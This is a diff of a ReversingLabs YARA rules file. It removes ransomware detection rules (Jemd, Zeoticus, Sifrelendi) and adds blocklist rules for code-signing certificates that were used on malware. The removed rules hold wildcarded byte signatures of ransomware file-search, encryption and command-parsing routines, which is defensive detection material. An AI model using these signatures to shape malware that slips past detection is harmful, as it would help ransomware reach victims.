-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
-            8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B
-            45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-        }
-		$file_extensions_4 = {
-            0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D
-            95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45
-            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F
-            84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84
-        }
-		$file_extensions_5 = {
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84
-            }
-		$parse_server_commands = {
-            83 F9 ?? 0F 84 E0 00 00 00 50 53 56 57 89 C3 89 D6 89 CF 31 D2 8A 06 8A 56 ?? 3C ?? 74 25 3C ?? 74 3E 3C ?? 74 51 3C ??
-            74 5C 3C ?? 74 76 3C ?? 0F 84 84 00 00 00 3C ?? 0F 84 8B 00 00 00 E9 97 00 00 00 83 F9 ?? 89 D8 7F 0A E8 ?? ?? ?? ?? E9
-            91 00 00 00 89 CA E8 ?? ?? ?? ?? E9 85 00 00 00 83 F9 ?? 89 D8 7F 07 E8 ?? ?? ?? ?? EB 77 89 CA E8 ?? ?? ?? ?? EB 6E 89
-            D8 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F3 EB 5F 55 89 D5 8B 54 2E ?? 89 D8 03 5C 2E ?? 8B 4C 2E ?? 8B 12 E8 62 FF FF FF 4F 7F
-            E8 5D EB 41 55 89 D5 89 D8 03 5C 2E ?? 89 F2 E8 ?? ?? ?? ?? 4F 7F F0 5D EB 2B 89 D8 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F3 EB
-            1C 89 D8 89 F2 83 C3 ?? E8 ?? ?? ?? ?? 4F 7F F1 EB 0B 5F 5E 5B 58 B0 ?? E9 ?? ?? ?? ?? 5F 5E 5B 58 C3 8B C0 B9 ?? ?? ??
-            ?? E9 0A FF FF FF C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $file_extensions_1 and $file_extensions_2 and $file_extensions_3 and $file_extensions_4 and $file_extensions_5 ) and $parse_server_commands )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AEEPZ Limited" and pe.signatures [ i ] . serial == "09:3f:f2:87:0f:a3:3e:af:47:25:94:57:ee:58:c2:e0" and 1503532800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Jemd : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_719C17A823839Dca813Ee85888B3B39A : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Jemd ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ef981ffa-8801-50f0-9441-5f2bfcf44133"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "ca5b9ec0-2c46-50db-bc47-b3c6c61e990e"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Jemd.yara#L1-L105"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16008-L16024"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "552e0fc118031e953dee2e7c6bf8234a5a90de8c34b0e2724dfe99f2b28b8c51"
+		logic_hash = "a160ada48048e11632082e7538459554d77d31539e53709cd897f3c454af8236"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Jemd"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 33 DB 89 9D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B
-            45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
-            64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 75
-            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B
-            45 ?? 50 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? B1 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$find_files_2 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 4D ??
-            89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 8D B5 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? ?? ?? ?? 89
-            C3 BB ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4B 75 ?? 33 DB 8D 45 ?? 33 C9 BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8A 14 1E 88 54 05 ?? 40 43 80 3C 1E ?? 74 ?? 83 F8
-            ?? 7E ?? 43 8D 85 ?? ?? ?? ?? 8D 55 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 8D 55 ?? B9 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 80 7C 1E
-            ?? ?? 75 ?? 80 3C 1E ?? 74 ?? 81 FB ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 33 C0 5A 59 59 64
-            89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ??
-            ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B D9 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
-            89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ??
-            8B D0 4A 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80
-            FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 50
-            8B 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF
-        }
-		$encrypt_files_p2 = {
-            75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ??
-            ?? 8B C6 83 C8 ?? 3B C6 75 ?? 80 FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B
-            45 ?? 50 8B 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? EB ?? FF
-            75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B
-            15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-		$main_routine = {
-            8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55
-            ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? E8 ??
-            ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 8D 55 ?? 66
-            B8 ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B1 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B
-            0D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 8B 08 FF 51 ?? 8D 55 ??
-            33 C0 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 8B 08 FF
-            51
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $main_routine ) and ( all of ( $find_files_* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "71:9c:17:a8:23:83:9d:ca:81:3e:e8:58:88:b3:b3:9a" and 1479686400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Zeoticus : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6Dc86Ebf5863568E2237B2D89582D705 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Zeoticus ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "483b20a4-2c16-5509-a503-2462a53d4d31"
-		date = "2021-03-19"
-		modified = "2021-03-19"
+		id = "24741dc7-6252-5964-a69f-bef4b2dfe1a7"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Zeoticus.yara#L1-L90"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16026-L16042"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "adf42b96139ad98f4253f3eba2c4af1be9545825605e0851185cc15284d9e9a0"
+		logic_hash = "f24cdf890bd0b51a83ca333c37bc22068ab1f7e7ef36b36d94a133773097bd37"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Zeoticus"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$enum_shares_p1 = {
-            53 55 8B 2D ?? ?? ?? ?? 8B C1 56 57 8B 3D ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 4C 24 ?? 51
-            8D 4C 24 ?? 51 6A ?? 8D 4C 24 ?? 51 6A ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 85 C0 74
-            ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 5C 24 ?? 89 5C 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 33 F6 39 73 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            33 FF D5 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0
-            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 33 FF D5 85 C0 0F 84 ?? ?? ?? ?? FF 33 8D 44 24
-            ?? FF 74 24 ?? 68 ?? ?? ?? ?? 50 FF D7 A1 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 89 04 8D ?? ?? ?? ?? 8D 4C 24 ?? 51
-        }
-		$enum_shares_p2 = {
-            50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8D 04 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 56 FF 34
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 56 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ??
-            ?? ?? ?? 41 FF 05 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 FF 85 C0 7E ?? 8D
-            5F ?? 8D 44 24 ?? 50 FF 34 BD ?? ?? ?? ?? FF D5 85 C0 0F 44 F3 47 3B 3D ?? ?? ?? ??
-            7C ?? 8B 5C 24 ?? 85 F6 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ??
-            ?? ?? 8B 3D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 50 FF D7
-            A1 ?? ?? ?? ?? 83 C4 ?? 8D 04 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 6A ?? FF 34 85 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ?? ??
-            ?? ?? 41 FF 05 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 74 24 ?? 83
-            C3 ?? 46 89 5C 24 ?? 89 74 24 ?? 3B 74 24 ?? 0F 82 ?? ?? ?? ?? 8B 5C 24 ?? 53 FF 15
-            ?? ?? ?? ?? 81 7C 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4
-            ?? ?? ?? ?? C3
-        }
-		$encrypt_files = {
-            68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ??
-            ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ??
-            83 C4 ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D7 83
-            C4 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D
-            04 45 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ??
-            FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 83 FB ?? 75 ?? E8 ?? ?? ?? ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? EB ?? 83 FB ?? 75 ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
-            56 6A ?? FF 35 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 E8 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? 51 E8 ?? ?? ??
-            ?? 83 C4 ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8
-        }
-		$find_files = {
-            81 EC ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 66 8B 01
-            83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 66 83 7C 24 ?? ?? 56 8D 71 ?? 0F 85 ?? ?? ?? ??
-            55 8B 2D ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 66 90 66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ??
-            66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 66 83 7C 74
-            ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 66 89 44 74 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
-            8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 4C 74 ?? 85 C0 74 ?? 33 F6 90
-            FF 34 B5 ?? ?? ?? ?? FF D7 83 F8 ?? 74 ?? 46 83 FE ?? 72 ?? 8D 44 24 ?? 50 FF 34 B5
-            ?? ?? ?? ?? FF D5 68 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D
-            4C 24 ?? 8D 51 ?? 66 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 66 83 7C 24 ??
-            ?? 8D 71 ?? 0F 84 ?? ?? ?? ?? 5F 5D 53 FF 15 ?? ?? ?? ?? 5E 5B 81 C4 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $enum_shares_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dening Hu" and pe.signatures [ i ] . serial == "6d:c8:6e:bf:58:63:56:8e:22:37:b2:d8:95:82:d7:05" and 1471305600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sifrelendi : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_214Df59Fe53874Cc011Dd45727035F51 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sifrelendi ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
